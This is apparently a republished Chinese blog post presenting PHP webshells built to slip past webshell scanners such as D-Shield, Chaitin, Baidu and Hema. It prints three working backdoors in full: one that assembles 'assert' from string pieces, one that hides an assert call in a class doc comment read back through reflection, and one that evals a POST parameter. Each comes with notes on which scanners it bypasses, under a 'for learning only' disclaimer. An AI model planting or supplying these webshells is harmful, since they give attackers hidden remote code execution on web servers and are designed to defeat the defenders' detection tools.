当前位置:网站首页>过D盾php webshell免杀马探讨
过D盾php webshell免杀马探讨
2022-07-21 14:06:00 【goddemon】
前言:
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任
最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结
在这个过程中发觉了其实webshell的bypass手法还是蛮多的
后缀bypass总结完了 经过实战也绕过了很多家最新的waf后缀
内容的还没写完 东西有点多
这里就分享一些php免杀的马 全过的也有贼多 但是暂时就不分享了
版本限制
使用条件:版本<7.1可用
这里发的是除了百度以外全过的(当然有全过的 但是暂时不会发出来)
马内容:
<?php
class get{
public $x="";
public $y="";
public function setName($name=1){
return $this -> name = $name;
}
}
$obj = new get();
$s = $obj -> setName($name="ass");
$s = $s."ert";
$a = " $_POST[1]";
$b=null;
$s($b.$a);
?>
bypass情况:
最新版D盾
长亭
百度家的没过
在线的 这个不建议使用 效果就离普 其他都能查出的他不行
河马
版本未限制的
马1(这个只过了d盾 不太理解这个d盾为啥不查)
内容:
<?php
/** * assert($_GET[1+0]); */
class User {
}
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$d = substr($comment , 14 , 20);
eval($d);
?>
d盾
长亭
百度
河马也不过
马2
马内容:
<?php
class get{
public $x="";
public $y="";
public function setName($name=1){
return $this -> name = $name;
}
}
$obj = new get();
$s = $obj -> setName($name="$_POST[1]");
eval($s);
bypass情况:
除百度其他的都过了
d盾
长亭的
百度
河马
边栏推荐
猜你喜欢
真人踩过的坑,告诉你避免自动化测试新手常犯的10个错误
数组双指针-刻意练习
ETH POS 2.0 Staking 测试网质押流程
Tencent took out 38K two days ago, which showed me the basic ceiling. Today share is for you~
华为机试-题目核心考点
Revit API:EditScope
攻防世界---mfw
iNFTnews | 佳士得推出风险投资部门,瞄准Web3和元宇宙产业
idea报错Port 8080 is already in use
Postman - post request application / x-www-from-urlencoded
随机推荐
初步学习Oracle之PL/SQL
js 图片转换base64 base64转换为file对象
牛客网链表题解记录
Tensorflow入门教程(三十八)——V2-Net
npm install 报 -4058错误
[wechat applet authorization] obtain the user's mobile number and nickname
上午面了个腾讯拿 38K 出来的,让我见识到了基础的天花板
【微信公众号h5】授权
Tensorflow入门教程(四十)——ACUNET
Zabbix3.0版报警设置
Short answer questions in container learning
专注跨境支付一体化服务 iPayLinks获《财资》3A亚洲奖
Kali WiFi cracking (multiple ways)
【读书会第13期】+第三章 视频文件的编码格式
前两天面了个腾讯拿 38K 出来的,让我见识到了基础的天花板,今天share给大家~
Virtual machine cannot connect to the Internet
真人踩过的坑,告诉你避免自动化测试新手常犯的10个错误
十大券商开户安全吗,风险大吗?
2022长三角工业自动化展会将于10月在南京国际展览中心召开
Simulink modeling and Simulation of parallel fuzzy PID compound controller